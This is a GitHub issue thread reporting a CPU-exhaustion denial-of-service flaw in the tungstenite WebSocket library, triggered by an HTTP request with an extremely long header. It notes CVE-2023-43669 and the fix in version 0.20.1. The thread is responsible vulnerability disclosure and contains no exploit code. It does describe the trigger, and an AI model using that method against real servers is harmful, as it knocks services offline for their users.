denial of service with long HTTP request header
rivkasegan opened this issue · 4 comments
I work on an application that depends on tungstenite and is intended to offer server-side ws:// support to untrusted clients over the public Internet. There are hundreds of instances of the server application operated independently by our community members, and it's not feasible to have other devices (e.g., web application firewalls) protect them. We want to avoid situations where a small number of malicious HTTP requests can devour server CPU resources.
I'm seeing that a single HTTP request (i.e., before the "upgrade: websocket" happens) with any long header can cause request processing to take several minutes or more. For example, testing on a low-cost Ubuntu 23.04 VPS as the server, if the header is 20 million characters, there's more than 99% CPU consumption for five minutes. Similar results have been seen by multiple persons on various Linux systems with tungstenite 0.20.0. Relative to this tungstenite source code
tungstenite-rs/src/handshake/machine.rs
Lines 41 to 56 in 53914c1
tungstenite-rs/src/handshake/server.rs
Lines 115 to 116 in 53914c1
We're able to work around this by checking for a large total header size (and dropping the client's connection) before any of tungstenite's code is called. However, maybe many other crates that depend on tungstenite could experience excessive CPU consumption if people can send long HTTP request headers.
The question is: should this issue be resolved within tungstenite, e.g., by rejecting long header lines (maybe in a configurable way) sooner, by avoiding calls to try_parse until a complete header line (ending with \n) is read, or by making some other change?
I don't think the issue can be attributed to the httparse crate - RFC 7230 3.2.5 allows unlimited header sizes, but tungstenite (in its role as code to implement a server) could choose an upper bound.
Is this a vulnerability in tungstenite, or is tungstenite simply not intended to remain performant when a header has millions of characters?
This is definitely a vulnerability, thank you for pointing at it. Too long requests have to be rejected early without trying to parse them.
This appears to have CVE-2023-43669 assigned.
Should be fixed in Tungstenite 0.20.1, please verify.
thank you! in my application, there's no longer excessive CPU consumption: when attempted, the outcome of check_incoming_packet_size was the first Err(Error::AttackAttempt) with 68232 bytes and 31 packets; the many legitimate users are fine with setting up their WebSocket connections and it's 159 bytes, 1 packet, Ok(())